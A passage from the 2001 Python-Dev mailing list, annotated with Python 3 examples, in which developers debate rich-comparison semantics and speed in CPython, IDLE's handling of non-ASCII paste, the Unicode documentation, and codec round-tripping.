Guido insisted (with cause <wink>) on these four pairs as being equivalent:

    x <  y  iff  y >  x
    x <= y       y >= x
    x == y       y == x
    x != y       y != x

but beyond that, in the presence of rich comparisons, agreed not to make any
other assumptions about what those pixel-bags "mean".  In particular, there's
no implication that "x <= y" iff "x < y or x == y", or that "x < y" implies
"x != y", etc.
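Python 3 still follows the rules listed above. When the left operand cannot answer, the interpreter tries the reflected operation on the right operand. It never synthesizes `<=` from `<` and `==`. The class `OnlyGreater` below is hypothetical and exists only to demonstrate that behaviour.

```python
class OnlyGreater:
    """Defines only __gt__ and __eq__; every other comparison is left
    to Python's default machinery."""

    def __init__(self, value):
        self.value = value

    def __gt__(self, other):
        if not isinstance(other, OnlyGreater):
            return NotImplemented
        return self.value > other.value

    def __eq__(self, other):
        if not isinstance(other, OnlyGreater):
            return NotImplemented
        return self.value == other.value


a, b = OnlyGreater(1), OnlyGreater(2)

# a < b: a has no __lt__ of its own, so Python tries the reflected b > a.
print(a < b)  # True

# a <= b: neither a.__le__ nor the reflected b.__ge__ is implemented, and
# Python does not fall back to "a < b or a == b".
try:
    a <= b
except TypeError as exc:
    print("TypeError:", exc)
```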

Applying that to the above leaves you with nothing but

   if (v == w && op == Py_EQ) /* then return Py_True */

Which is about all PyObject_Compare's

	if (v == w)
		return 0;

assumes too.  So I don't see much future in that.

[later, a patch to fill in the richcmp slot for strings]
> +static PyObject*
> +string_richcompare(PyStringObject *a, PyStringObject *b, int op)
> +{
> +	int c;
> +	PyObject *result;
> +	if (!PyString_Check(b)) {
> +		result = Py_NotImplemented;
> +		goto out;
> +	}
> +	if (op == Py_EQ) {
> +		if (a->ob_size != b->ob_size) {
> +			result = Py_False;
> +			goto out;
> +		}
> +#ifdef CACHE_HASH
> +		if (a->ob_shash != b->ob_shash
> +		    && a->ob_shash != -1
> +		    && b->ob_shash != -1) {
> +			result = Py_False;
> +			goto out;
> +		}
> +#endif
> +	}
> +	c = string_compare(a, b);
> +	switch (op) {
> +	case Py_LT: c = c <  0; break;
> +	case Py_LE: c = c <= 0; break;
> +	case Py_EQ: c = c == 0; break;
> +	case Py_NE: c = c != 0; break;
> +	case Py_GT: c = c >  0; break;
> +	case Py_GE: c = c >= 0; break;
> +	default:
> +		result = Py_NotImplemented;
> +		goto out;
> +	}
> +	result = c ? Py_True : Py_False;
> +  out:
> +	Py_INCREF(result);
> +	return result;

[and that yields about an 8% speedup in the "<" case]

That looks on the right track, but maybe at the wrong level:  why is it
necessary?  That is, the bulk of the "smarts" here in the switch stmt are
type-independent:  if there's no specific implementation of individual
comparisons, but there is a tp_compare, then the switch stmt applies verbatim
to *any* such type.  Do we have to fill in the richcmp slot for everything to
get Python to realize that?  I mean "just about everything", too:  while,
e.g., ceval special-cases "<" for ints, that doesn't do sorting or max or min
etc on ints a lick of good (they don't go thru the COMPARE_OP opcode then,
but thru the general comparison routines).
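The switch really is type-independent: it only reads the sign of a 3-way result. Here is a minimal Python sketch of deriving all six rich comparisons from one 3-way compare. `SIGN_TEST`, `three_way` and `rich_from_3way` are hypothetical names, not CPython internals.

```python
# One sign test per rich-comparison op, mirroring the C switch statement.
# Nothing here depends on the operand type.
SIGN_TEST = {
    "<": lambda c: c < 0,
    "<=": lambda c: c <= 0,
    "==": lambda c: c == 0,
    "!=": lambda c: c != 0,
    ">": lambda c: c > 0,
    ">=": lambda c: c >= 0,
}


def three_way(v, w):
    """Classic cmp(): -1, 0 or 1 (Python 3 dropped the builtin)."""
    return (v > w) - (v < w)


def rich_from_3way(v, w, op, cmp=three_way):
    """Answer any rich comparison from a single 3-way compare."""
    return SIGN_TEST[op](cmp(v, w))


print(rich_from_3way("abc", "abd", "<"))  # True
print(rich_from_3way(3, 3, ">="))         # True
```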

The "speed problem" appears to be:

+ COMPARE_OP calls cmp_outcome()
+   which calls PyObject_RichCompare()
+     which calls do_richcmp()
+       which calls try_rich_compare() (unsuccessfully now,
                                        successfully after your patch)
          which fails to find a richcmp slot on either operand (now)
          so says "not implemented"
+       then calls try_3way_to_rich_compare()
+         which calls try_3way_compare()
+            which finally calls the tp_compare slot
+            then runs exactly the same
                 switch (op) {
                 case Py_LT: c = c <  0; break;
                 case Py_LE: c = c <= 0; break;
                 case Py_EQ: c = c == 0; break;
                 case Py_NE: c = c != 0; break;
                 case Py_GT: c = c >  0; break;
                 case Py_GE: c = c >= 0; break;
                 }
                 result = c ? Py_True : Py_False;
             switch as your patch

and things unwind.  So we've got 7 function calls there, not even counting
calls to PyErr_Occurred() and PyObject_IsTrue(), all to find about 3 machine
instructions that actually do the compare <wink>.

You got an 8% speedup for one type by tricking the switch stmt into appearing
3 calls earlier.  What if the implementation were smarter, and did it for
*all* relevant types even a call or two before that?

I don't see any reason "in principle" that compares couldn't be much faster,
and via the usual gimmicks:  bigger, smarter functions that remember what
they've already determined so don't need to figure it out over and over
again, and fast paths to favor common cases at the expense of comparisons
from Mars.  One thing to note here:  the workhorse comparisons are "like
strings" in having no *logical* need for richcmps at all; and the objects for
which richcmps were introduced were numerical arrays, which can much better
afford a longer code path to *find* them (one matrix compare will trigger
many vanilla element compares anyway, so even for arrays it's much more
important that the *latter* be fast).  The code now is approximately
backwards in that respect (it takes gobs of work before we even *look* for a
cmp now -- indeed, if a type has both cmp and richcmp slots now, and we're
doing an explicit "cmp" compare, the code now tries to *simulate* cmp first
via a long sequence of richcmp calls!).

I don't have time to uglify this code, but Python would benefit from it.

and-no-matter-what-guido-may-say<wink>-ly y'rs  - tim


From tim.one@home.com  Tue May 15 04:50:00 2001
From: tim.one@home.com (Tim Peters)
Date: Mon, 14 May 2001 23:50:00 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
In-Reply-To: <E14zQ63-0002ZA-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEDOKCAA.tim.one@home.com>

[Guido]
> Index: spam.c
> ...

Congratulations!  "My other" ISP (MSN) just started tagging suspected spam
with "spam" in the subject line, and my mail reader moves that to a special
spam folder upon delivery.  So far this is the one and only incoming email
it's moved.  Many solicitations to help foreign nationals move large sums of
money out of their country have gotten through, along with a number of
intriguing promises that I can easily increase the size of my penis -- like I
have any need for either of those <wink>.

reads-every-spam-he-gets-top-to-bottom-ly y'rs  - tim


From esr@thyrsus.com  Tue May 15 04:53:38 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Mon, 14 May 2001 23:53:38 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEDOKCAA.tim.one@home.com>; from tim.one@home.com on Mon, May 14, 2001 at 11:50:00PM -0400
References: <E14zQ63-0002ZA-00@usw-pr-cvs1.sourceforge.net> <LNBBLJKPBEHFEDALKOLCEEDOKCAA.tim.one@home.com>
Message-ID: <20010514235338.C663@thyrsus.com>

Tim Peters <tim.one@home.com>:
>              Many solicitations to help foreign nationals move large sums of
> money out of their country have gotten through, along with a number of
> intriguing promises that I can easily increase the size of my penis -- like I
> have any need for either of those <wink>.

What we should truly fear is the prospect that you might increase the size
of your <wink>.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"The state calls its own violence `law', but that of the individual `crime'"
	-- Max Stirner


From uche.ogbuji@fourthought.com  Tue May 15 05:26:31 2001
From: uche.ogbuji@fourthought.com (Uche Ogbuji)
Date: Mon, 14 May 2001 22:26:31 -0600
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules
 spam.c,1.1.2.3,1.1.2.4
In-Reply-To: Message from "Tim Peters" <tim.one@home.com>
 of "Mon, 14 May 2001 23:50:00 EDT." <LNBBLJKPBEHFEDALKOLCEEDOKCAA.tim.one@home.com>
Message-ID: <200105150426.f4F4QVx01531@localhost.local>

> [Guido]
> > Index: spam.c
> > ...
> 
> Congratulations!  "My other" ISP (MSN) just started tagging suspected spam
> with "spam" in the subject line, and my mail reader moves that to a special
> spam folder upon delivery.  So far this is the one and only incoming email
> it's moved.  Many solicitations to help foreign nationals move large sums of
> money out of their country have gotten through [...]

I thought I was the only one getting all these silly Nigerian scam spams.  I 
figured maybe they saw my name and decided to test on me (though they might 
more cleverly have figured that a fellow Nigerian would be wise to the game).

However, with the (sloppily) bogus headers I've always found on those things, 
I'm surprised your ISP couldn't sniff them out.

Not that it matters.  The Eastern Nigerian proverb gets it right.

"Once hunters learn to shoot without missing, birds will learn to fly without 
resting".


-- 
Uche Ogbuji                               Principal Consultant
uche.ogbuji@fourthought.com               +1 303 583 9900 x 101
Fourthought, Inc.                         http://Fourthought.com 
4735 East Walnut St, Ste. C, Boulder, CO 80301-2537, USA
Software-engineering, knowledge-management, XML, CORBA, Linux, Python


From tim.one@home.com  Tue May 15 07:28:34 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 15 May 2001 02:28:34 -0400
Subject: [Python-Dev] IDLE and non-ASCII characters
In-Reply-To: <200105141141.NAA22376@pandora.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEEEKCAA.tim.one@home.com>

[Guido]
> Postscript: using cut and paste, I *can* enter "s='äö'" in IDLE at the
> Python prompt, both on Linux and on Windows 98.  It prints as
> '\xe4\xf6' on both systems.  What changed?

[Martin]
> Perhaps the Tcl version? That sounds like the issue that Marc talked
> about: Tk behaves differently when text is entered programmatically
> (and perhaps through cut-n-paste), as compared to text entered through
> the keyboard. Using cut-n-paste with Tk 8.3.1, CVS python, X11R6.3 on
> Solaris 8 still gives me the UnicodeError.

I don't know which version of Python Guido used.  I tried cut-&-paste of

    s='äö'

from his email into the distributed 2.1 IDLE under Win98, and got

    UnicodeError: ASCII encoding error: ordinal not in range(128)

Tk appears to interfere with using the usual Windows ALT+0nnn method of
entering funny characters, so unsure what happens then -- but for me it
either works fine or does something insane (moves the cursor to the left
margin, brings up an IDLE dialog box, etc).

If I open the system Character Map utility and copy-&-paste using *that*, I
can enter all sorts of stuff without problem:

>>> s = "àáâãäåæçèéêëìíîïðñòòóôõö÷øùúûüýþÿ"
>>> s
'\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef
\xf0\xf1\xf2\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'
>>>

So not all clipboard entries are created equal.

Another clue:  if I paste the s='äö' snippet from Guido's email into a file
opened with Notepad, then immediately copy it again from the Notepad doc,
then paste that into Idle, again no problem:

>>> s='äö'
>>> s
'\xe4\xf6'
>>>

Using a clipboard diagnostic tool I don't understand, when I copy from
Notepad these data formats are in the system clipboard:

    TEXT
    LOCALE
    OEMTEXT

But when I copy from Guido's email under Outlook 2000, it's

    DataObject
    Rich Text Format
    Rich Text Format Without Objects
    RTF as Text
    TEXT
    UNICODTEXT
    Ole Private Data
    LOCALE
    OEMTEXT

Under Character Map, it's

    Rich Text Format
    TEXT
    LOCALE
    OEMTEXT

So perhaps it's not the version of Tk but the source of the data, and that Tk
grabs an unfortunate data format (when present) from the clipboard in
preference to a fortunate one.

the-clipboard-is-a-complex-beast-ly y'rs  - tim


From martin@loewis.home.cs.tu-berlin.de  Tue May 15 07:44:23 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Tue, 15 May 2001 08:44:23 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEDNKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCCEDNKCAA.tim.one@home.com>
Message-ID: <200105150644.f4F6iN501475@mira.informatik.hu-berlin.de>

> Applying that to the above leaves you with nothing but
> 
>    if (v == w && op == Py_EQ) /* then return Py_True */
> 
> [...] So I don't see much future in that.

Is this really exactly what Python would guarantee? I'm surprised that
x==x would always be true, but x!=x might be true also. In a type where
x!=x holds, wouldn't people also want to say that x==x might fail? IOW,
I had expected that you'd reduced it to

  if (v == w && op == Py_EQ) /* then return Py_True */
  if (v == w && op == Py_NE) /* then return Py_False */

The one application where this may help is list_contains, in
particular when searching a list of interned strings.
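For what it's worth, later CPython did add an identity check in this spot: `PyObject_RichCompareBool()`, which list containment uses, treats identical objects as equal without calling `__eq__`. A small Python 3 sketch showing that, and showing that `sys.intern()` makes equal strings identical so the identity check alone can find them. The `Noisy` class is hypothetical.

```python
import sys


class Noisy:
    """Hypothetical type that counts how often __eq__ runs."""

    calls = 0

    def __eq__(self, other):
        Noisy.calls += 1
        return False  # never claims equality on its own


x = Noisy()
print(x in [x])     # True: found by identity
print(Noisy.calls)  # 0: __eq__ was never called

# A string built at run time, once interned, is the same object as the
# interned literal, so an identity check is enough to match it.
key = sys.intern("".join(["spam", "_eggs"]))
print(key is sys.intern("spam_eggs"))  # True
```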

> You got an 8% speedup for one type by tricking the switch stmt into
> appearing 3 calls earlier.  What if the implementation were smarter,
> and did it for *all* relevant types even a call or two before that?

Please have a look at the patch below. Since I have done a CVS update since
yesterday, I had to re-measure the baseline results:

0.790
0.780
0.770
0.780
0.780
0.790
0.780
0.790
0.790
0.790

The patch moves the case "equal types, supporting cmp" somewhat earlier,
just after the attempt to do richcompare. Now I get

0.760
0.770
0.750
0.770
0.750
0.750
0.760
0.760
0.760
0.760

So while there is some saving, this is not as good as implementing
richcompare.

> I don't see any reason "in principle" that compares couldn't be much
> faster, and via the usual gimmicks: bigger, smarter functions that
> remember what they've already determined so don't need to figure it
> out over and over again, and fast paths to favor common cases at the
> expense of comparisons from Mars.

I agree "in principle" :-) However, you cannot move the case "equal
types, implementing tp_compare" before the case "one of them
implements tp_richcompare" without changing the semantics. 

The change here is what you'd do when you have both richcmp and
oldcomp; Python clearly mandates using richcmp. In case this is not
obvious (it wasn't to me): UserList will complain about using the
deprecated __cmp__, and dictionaries will iterate over their elements
differently.

Given that richcomp has to be tried first, this patch does the "common
case" at the earliest possible time, and with no overhead except for a
PyErr_Occurred() call.

So yes, compares can be much faster, BUT YOU HAVE TO SUPPORT
TP_RICHCOMPARE (sorry for shouting). If you think the extra work for
type implementors is not acceptable, we can offer a convenience
function that everybody implementing tp_compare can put into
tp_richcompare. For strings, I would still special-case
tp_richcompare: when tracing calls to string_richcompare, I found that
most calls with Py_EQ can be decided by checking that the string
lengths are not equal. This is all "bigger, faster functions" put to
work.

Regards,
Martin

Index: object.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v
retrieving revision 2.131
diff -u -r2.131 object.c
--- object.c	2001/05/11 03:36:45	2.131
+++ object.c	2001/05/15 06:16:53
@@ -477,16 +477,6 @@
 	if (PyInstance_Check(w))
 		return (*w->ob_type->tp_compare)(v, w);
 
-	/* If the types are equal, don't bother with coercions etc. */
-	if (v->ob_type == w->ob_type) {
-		if ((f = v->ob_type->tp_compare) == NULL)
-			return 2;
-		c = (*f)(v, w);
-		if (PyErr_Occurred())
-			return -2;
-		return c < 0 ? -1 : c > 0 ? 1 : 0;
-	}
-
 	/* Try coercion; if it fails, give up */
 	c = PyNumber_CoerceEx(&v, &w);
 	if (c < 0)
@@ -590,15 +580,21 @@
    -1 if v < w;
     0 if v == w;
     1 if v > w;
+   If the object implements a tp_compare function, it returns
+   whatever this function returns (whether with an exception or not).
 */
 static int
 do_cmp(PyObject *v, PyObject *w)
 {
 	int c;
+	cmpfunc f;
 
 	c = try_rich_to_3way_compare(v, w);
 	if (c < 2)
 		return c;
+	if (v->ob_type == w->ob_type
+	    && (f = v->ob_type->tp_compare) != NULL)
+		return (*f)(v, w);
 	c = try_3way_compare(v, w);
 	if (c < 2)
 		return c;
@@ -760,16 +756,9 @@
 }
 
 static PyObject *
-try_3way_to_rich_compare(PyObject *v, PyObject *w, int op)
+convert_3way_to_object(int op, int c)
 {
-	int c;
 	PyObject *result;
-
-	c = try_3way_compare(v, w);
-	if (c >= 2)
-		c = default_3way_compare(v, w);
-	if (c <= -2)
-		return NULL;
 	switch (op) {
 	case Py_LT: c = c <  0; break;
 	case Py_LE: c = c <= 0; break;
@@ -782,16 +771,46 @@
 	Py_INCREF(result);
 	return result;
 }
+	
 
 static PyObject *
+try_3way_to_rich_compare(PyObject *v, PyObject *w, int op)
+{
+	int c;
+
+	c = try_3way_compare(v, w);
+	if (c >= 2)
+		c = default_3way_compare(v, w);
+	if (c <= -2)
+		return NULL;
+	return convert_3way_to_object(op, c);
+}
+
+static PyObject *
 do_richcmp(PyObject *v, PyObject *w, int op)
 {
 	PyObject *res;
+	cmpfunc f;
 
+
 	res = try_rich_compare(v, w, op);
 	if (res != Py_NotImplemented)
 		return res;
 	Py_DECREF(res);
+
+	/* If the types are equal, don't bother with coercions etc. 
+	   Instances are special-cased in try_3way_compare, since
+	   a result of 2 does *not* mean one value being greater
+	   than the other. */
+	if (v->ob_type == w->ob_type
+	    && !PyInstance_Check(v)
+	    && (f = v->ob_type->tp_compare) != NULL) {
+		int c;
+		c = (*f)(v, w);
+		if (PyErr_Occurred())
+			return NULL;
+		return convert_3way_to_object(op, c);
+	}
 
 	return try_3way_to_rich_compare(v, w, op);
 }


From tim.one@home.com  Tue May 15 08:33:06 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 15 May 2001 03:33:06 -0400
Subject: [Python-Dev] Unicode docs
In-Reply-To: <3AFFA23F.248517E3@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEEHKCAA.tim.one@home.com>

I don't know that the Unicode docs need massive work, but the docs that are
there simply don't answer the technical questions people have:  they're too
thin.

Let's keep it simple.  Contrast the Library manual's:

    unicode(string[, encoding[, errors]])
    Decodes string using the codec for encoding. Error handling is
    done according to errors. The default behavior is to decode UTF-8
    in strict mode, meaning that encoding errors raise ValueError. See
    also the codecs module.

with Andrew's description (from http://www.amk.ca/python/2.0/):

    unicode(string [, encoding] [, errors])
    Creates a Unicode string from an 8-bit string. encoding is a
    string naming the encoding to use. The errors parameter specifies
    the treatment of characters that are invalid for the current
    encoding; passing 'strict' as the value causes an exception
    to be raised on any encoding error, while 'ignore' causes errors
    to be silently ignored and 'replace' uses U+FFFD, the official
    replacement character, in case of any problems.

The latter addresses several *fundamental* questions untouched by the former,
like what are the datatypes of the arguments and the result, what values does
errors accept, and what do they mean?  The first blurb answers some more,
like what's the default encoding, and which exception is raised?  Neither is
complete on its own, but the reference manual should have a complete answer
to all such questions.  It doesn't have to go on at great length.

A round-trip example would be invaluable.
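A round-trip example of the kind asked for might look like this in today's Python 3. There, `bytes.decode()` and `str.encode()` play the roles of `unicode()` and `.encode()` in the 2.x API discussed here. This is a sketch, not text from the actual docs.

```python
raw = b"abc\xe4\xf6\xfc"       # Latin-1 bytes for "abcäöü"
text = raw.decode("latin-1")   # bytes -> text; unicode(raw, "latin-1") in 2.x
back = text.encode("latin-1")  # text -> bytes
print(ascii(text))             # 'abc\xe4\xf6\xfc'
print(back == raw)             # True: Latin-1 round-trips every byte

utf8 = text.encode("utf-8")    # same text, different bytes
print(utf8)                    # b'abc\xc3\xa4\xc3\xb6\xc3\xbc'
print(utf8.decode("utf-8") == text)  # True
```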

If Fred wanted to incorporate a brief overview too, a light rework of
Andrew/Moshe's writeup would be an excellent start.


From tim.one@home.com  Tue May 15 08:47:16 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 15 May 2001 03:47:16 -0400
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
In-Reply-To: <3AFF9F1B.A1CDD617@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEEJKCAA.tim.one@home.com>

[M.-A. Lemburg]
> The problem is: which part would raise the exception -- the
> encoder or the decoder ?

Since I don't yet use any of this stuff for real, I have no idea:  seems
mostly a question of pragmatics, and I don't have any feel for how cp875
users would view it.

> Here are some more options:
>
> * sort the items before creating the encoding table from the
>   decoding one (makes the mapping stable)

If users don't care that round-trip can fail silently, fine.

> * map keys which have multiple mappings in the encoding table
>   to None -- this causes their usage to raise an exception
>   (undefined mapping)

If users don't care that they'll get an exception when they try something
that can't be round-tripped, fine.  Or would this depend on the value of the
"errors" argument too?  Then it's easier to impose.

There's a theme here <wink>:  I have no idea how important roundtrip is in
Unicode Practice, or even that it's a constant across apps and encodings.  If
I write a codec to map all ASCII consonants to u"k" and vowels to u"a",  I
wouldn't care that I can't get "love" back from u"kaka" <wink>.


From mal@lemburg.com  Tue May 15 09:19:06 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Tue, 15 May 2001 10:19:06 +0200
Subject: [Python-Dev] Unicode docs
References: <LNBBLJKPBEHFEDALKOLCOEEHKCAA.tim.one@home.com>
Message-ID: <3B00E67A.C5769082@lemburg.com>

Tim Peters wrote:
> 
> I don't know that the Unicode docs need massive work, but the docs that are
> there simply don't answer the technical questions people have:  they're too
> thin.

As much as I would like to work on this, I simply don't have the
time... if someone wants to contribute more detailed docs, though,
I'd be glad to review them and answer remaining questions.

Note that I will give a talk at the upcoming Bordeaux conference about
Python and Unicode. The slides will eventually go online after
the conference (in July). BTW, are any python-devs attending the
conference (they have some great wine in that part of France ;-) ?

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Tue May 15 09:32:14 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Tue, 15 May 2001 10:32:14 +0200
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCAEEJKCAA.tim.one@home.com>
Message-ID: <3B00E98E.1C44FF5@lemburg.com>

Tim Peters wrote:
> 
> [M.-A. Lemburg]
> > The problem is: which part would raise the exception -- the
> > encoder or the decoder ?
> 
> Since I don't yet use any of this stuff for real, I have no idea:  seems
> mostly a question of pragmatics, and I don't have any feel for how cp875
> users would view it.

If there are any... that code page dates back to 1996 and is
based in the EBCDIC world.
 
> > Here are some more options:
> >
> > * sort the items before creating the encoding table from the
> >   decoding one (makes the mapping stable)
> 
> If users don't care that round-trip can fail silently, fine.
> 
> > * map keys which have multiple mappings in the encoding table
> >   to None -- this causes their usage to raise an exception
> >   (undefined mapping)
> 
> If users don't care that they'll get an exception when they try something
> that can't be round-tripped, fine.  Or would this depend on the value of the
> "errors" argument too?  Then it's easier to impose.

The errors argument tells the codecs what to do in case a mapping
fails (from codecs.py):

        The .encode()/.decode() methods may implement different error
        handling schemes by providing the errors argument. These
        string values are defined:

         'strict' - raise a ValueError error (or a subclass)
         'ignore' - ignore the character and continue with the next
         'replace' - replace with a suitable replacement character;
                    Python will use the official U+FFFD REPLACEMENT
                    CHARACTER for the builtin Unicode codecs.

'strict' is the default for all operations that deal with auto-
conversion. 'ignore' and 'replace' allow silently ignoring the
problem.
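The same three schemes still exist in Python 3's codecs. Here is a short sketch of what each does with input the ASCII codec cannot handle. The builtin codecs use U+FFFD only when decoding; when encoding to a legacy charset, 'replace' substitutes '?'.

```python
bad = b"abc\xff"  # 0xff is not valid ASCII

try:
    bad.decode("ascii")            # errors="strict" is the default
except UnicodeDecodeError as exc:  # subclass of UnicodeError, hence ValueError
    print(isinstance(exc, ValueError))  # True

print(ascii(bad.decode("ascii", "ignore")))   # 'abc'
print(ascii(bad.decode("ascii", "replace")))  # 'abc\ufffd' (U+FFFD)
print("abc\xe4".encode("ascii", "replace"))   # b'abc?' when encoding
```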
 
> There's a theme here <wink>:  I have no idea how important roundtrip is in
> Unicode Practice, or even that it's a constant across apps and encodings.  If
> I write a codec to map all ASCII consonants to u"k" and vowels to u"a",  I
> wouldn't care that I can't get "love" back from u"kaka" <wink>.

Round-tripping is obviously very important if you use Unicode
as the basis for working on text. I don't know about the reasoning
behind making cp875 fail the round-trip -- Unicode certainly
provides means to make mappings round-trip safe (e.g. by falling
back to code points in the Private Use Area).
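The two options listed earlier in this thread can be sketched in Python: sort before inverting the decoding table, or map colliding characters to None. The helper names and the three-entry table are hypothetical; this is not the real cp875 data or Python's codec generator.

```python
def build_encoding_table(decoding, on_collision="sort"):
    """Invert a byte->char decoding table into a char->byte encoding table.

    "sort": walk bytes in sorted order so the lowest byte wins (stable, but
            the other bytes silently fail to round-trip).
    "none": map colliding characters to None so encoding them raises.
    """
    encoding = {}
    collided = set()
    for byte, char in sorted(decoding.items()):
        if char in encoding:
            collided.add(char)
            continue
        encoding[char] = byte
    if on_collision == "none":
        for char in collided:
            encoding[char] = None
    return encoding


def round_trips(decoding, encoding):
    """True if every byte decodes and then encodes back to itself."""
    return all(encoding.get(char) == byte for byte, char in decoding.items())


# Made-up table in which two bytes decode to the same character.
decoding = {0x41: "A", 0x42: "B", 0xC1: "A"}
print(build_encoding_table(decoding))          # {'A': 65, 'B': 66}
print(build_encoding_table(decoding, "none"))  # {'A': None, 'B': 66}
print(round_trips(decoding, build_encoding_table(decoding)))  # False
```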



From tim.one@home.com  Tue May 15 10:26:32 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 15 May 2001 05:26:32 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105150644.f4F6iN501475@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>

[Martin v. Loewis]
> Is this really exactly what Python would guarantee? I'm surprised that
> x==x would always be true, but x!=x might be true also. In a type where
> x!=x holds, wouldn't people also want to say that x==x might fail? IOW,
> I had expected that you'd reduced it to
>
>   if (v == w && op == Py_EQ) /* then return Py_True */
>   if (v == w && op == Py_NE) /* then return Py_False */

I agree that would be more analogous to what PyObject_Compare() does.

I'm not sure either makes sense for rich comparisons; for example, under
IEEE-754 rules, a NaN must compare not-equal to everything, including
itself(!), and richcmps are the only hope Python users have of modeling that.
Doing those pointer checks before giving richcmps a chance would kill that
hope.  Can we agree to drop this one until somebody produces stats saying
it's important?  I have no reason to suspect that it is.
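The NaN case is easy to see in Python 3. So is the catch with the identity shortcut CPython later adopted for containment and container equality: float comparisons follow IEEE-754, yet a container holding the *same* NaN object still reports it as present. A short sketch:

```python
import math

nan = float("nan")
print(nan == nan, nan != nan)  # False True: IEEE-754 rich comparisons
print(math.isnan(nan))         # True

# Containers check identity before calling ==, so the very same NaN object
# is "found" even though nan == nan is False.
print(nan in [nan])            # True
print([nan] == [nan])          # True
print(float("nan") in [nan])   # False: a different NaN object
```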

> The one application where this may help is list_contains, in
> particular when searching a list of interned strings.

string_compare() could special-case pointer equality too, although I suspect
doing so would be a net loss.

> Please have a look at the patch below.

I will, but not tonight anymore -- it's been a very long day.

> ...
> I agree "in principle" :-) However, you cannot move the case "equal
> types, implementing tp_compare" before the case "one of them
> implements tp_richcompare" without changing the semantics.

Of course.  But except for instance objects, answering "does the type
implement tp_richcompare?" is one lousy pointer check, and the answer will
usually be-- provided we don't start stuffing code into *every* object's
tp_richcompare slot! --"no, so I can go to tp_compare immediately".
Coercions and richcmps are the oddball cases today.

> The change here is what you'd do when you have both richcmp and
> oldcomp; Python clearly mandates using richcmp.

Yes, except you don't usually have both today and reality is exploitable
<wink>.

> In case this is not obvious (it wasn't to me): UserList will complain
> about using the deprecated __cmp__,

Sounds like a bug to me; if cmp is deprecated, that's also news to me.

> and dictionaries will iterate over their elements differently.

dicts didn't have a tp_richcompare slot until I added it last week, and I
added it because dicts can do a much faster and more general job on Py_EQ
and Py_NE than dict cmp can (but on nothing else).  I originally took away
the tp_compare slot for dicts and lived to regret it -- they have both now.

> Given that richcomp has to be tried first, this patch does the "common
> case" at the earliest possible time, and with no overhead, except for
> PyErr_Occurred call.

The earliest *reasonable* time would be after a short block of new pointer
checks while still inside PyObject_RichCompare():  I believe the usual case
today is that the objects are of the same type, the type doesn't have a
tp_richcompare slot, but does have a tp_compare slot.  This covers at least
ints, floats, longs and strings, where the overhead of a single function call
is most often larger than the time it actually takes to compare the darned
things.  It's not important to, e.g., get to a dict comparison quickly,
because comparing dicts is darned expensive even after we find the dict
comparison routine.  Ditto comparing instances or matrices etc.  Optimizing
for richcmps is optimizing the less important thing.
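The proposed ordering can be modeled in a few lines of Python. This is a simulation, not CPython code: `Slots`, `rich_compare` and the path labels are hypothetical, and coercion is left out. Testing "same type, no richcmp, has a 3-way compare" first changes nothing for types without a richcmp slot. A type that does provide one, here an IEEE-754-style float, still has it honored.

```python
import operator
from dataclasses import dataclass
from typing import Callable, Optional

OPS = {"<": operator.lt, "<=": operator.le, "==": operator.eq,
       "!=": operator.ne, ">": operator.gt, ">=": operator.ge}
SWAPPED = {"<": ">", "<=": ">=", "==": "==", "!=": "!=", ">": "<", ">=": "<="}


@dataclass
class Slots:
    """Hypothetical stand-in for a C type's comparison slots."""
    compare: Optional[Callable] = None  # 3-way: returns <0, 0 or >0
    richcmp: Optional[Callable] = None  # (v, w, op) -> bool or NotImplemented


def rich_compare(vt, v, wt, w, op):
    """Return (result, path taken); vt and wt are the operands' Slots."""
    # Common case first: a few pointer tests, then straight to compare.
    # Safe because there is no richcmp slot whose answer could differ.
    if vt is wt and vt.richcmp is None and vt.compare is not None:
        return OPS[op](vt.compare(v, w), 0), "fast"
    # Otherwise richcmp on either operand gets the first chance.
    if vt.richcmp is not None:
        res = vt.richcmp(v, w, op)
        if res is not NotImplemented:
            return res, "rich"
    if wt.richcmp is not None:
        res = wt.richcmp(w, v, SWAPPED[op])
        if res is not NotImplemented:
            return res, "rich-reflected"
    # Last resort in this sketch: a same-type 3-way compare.
    if vt is wt and vt.compare is not None:
        return OPS[op](vt.compare(v, w), 0), "3way"
    raise TypeError(f"no way to evaluate {op!r}")


def three_way(a, b):
    return (a > b) - (a < b)


int_slots = Slots(compare=three_way)
float_slots = Slots(compare=three_way, richcmp=lambda v, w, op: OPS[op](v, w))

nan = float("nan")
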